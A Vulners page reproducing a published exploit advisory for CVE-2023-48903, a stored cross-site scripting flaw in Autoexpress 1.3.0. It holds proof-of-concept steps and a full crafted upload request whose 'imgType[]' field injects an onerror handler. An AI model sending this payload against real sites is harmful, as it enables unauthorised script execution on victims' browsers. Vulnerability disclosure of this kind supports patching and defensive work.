Vulners
Lucene search
Tramyardg Autoexpress 1.3.0 Cross Site Scripting Vulnerability
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | CVE-2023-48903 | 21 Mar 202404:15 | – | attackerkb |
 | AutoExpress 安全漏洞 | 21 Mar 202400:00 | – | cnnvd |
 | CVE-2023-48903 | 21 Mar 202400:00 | – | cve |
 | CVE-2023-48903 | 21 Mar 202400:00 | – | cvelist |
 | CVE-2023-48903 | 21 Mar 202404:15 | – | nvd |
 | Tramyardg Autoexpress 1.3.0 Cross Site Scripting | 19 Mar 202400:00 | – | packetstorm |
 | PT-2024-13659 · Unknown · Tramyardg Autoexpress | 21 Mar 202400:00 | – | ptsecurity |
 | CVE-2023-48903 | 23 May 202504:23 | – | redhatcve |
 | CVE-2023-48903 | 21 Mar 202400:00 | – | vulnrichment |
# Exploit Title: tramyardg autoexpress - Stored Cross-Site Scripting (XSS)
# Exploit Author: Scott White
# Vendor Homepage: https://github.com/tramyardg/autoexpress
# Version: v1.3.0
# Tested on: Ubuntu 22.04.3 LTS + Apache/2.4.52
# CVE : CVE-2023-48903
# References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48903
https://www.cve.org/CVERecord?id=CVE-2023-48903
# Description:
Autoexpress 1.3.0 is affected by a stored cross-site scripting (XSS) feature that allows for an unauthenticated attacker to execute JavaScript commands.
# Proof of Concept:
+ Go to "http://localhost/autoexpress"
+ Craft POST request to /autoexpress/admin/api/uploadCarImages.php within BurpSuite (Repeater)
+ The form-data name "imageType[]" is vulnerable
# Sample Request
POST /autoexpress/admin/api/uploadCarImages.php HTTP/1.1
Host: localhost
Content-Length: 17016
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9juDWgTa5YsjE2YR
Origin: http://localhost
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
------WebKitFormBoundary9juDWgTa5YsjE2YR
Content-Disposition: form-data; name="files[]"; filename="image.jpeg"
Content-Type: image/jpeg
IMAGE_CONTENT
------WebKitFormBoundary9juDWgTa5YsjE2YR
Content-Disposition: form-data; name="id"
CAR_ID
------WebKitFormBoundary9juDWgTa5YsjE2YR
Content-Disposition: form-data; name="fd[]"
IMAGE_CONTENT_BASE64_ENCODED
------WebKitFormBoundary9juDWgTa5YsjE2YR
Content-Disposition: form-data; name="imgType[]"
data:image/jpeg;base64"onerror=alert(1002)<!--------WebKitFormBoundary9juDWgTa5YsjE2YR--
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Mar 2024 00:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 3.16.1
EPSS0.00186
SSVC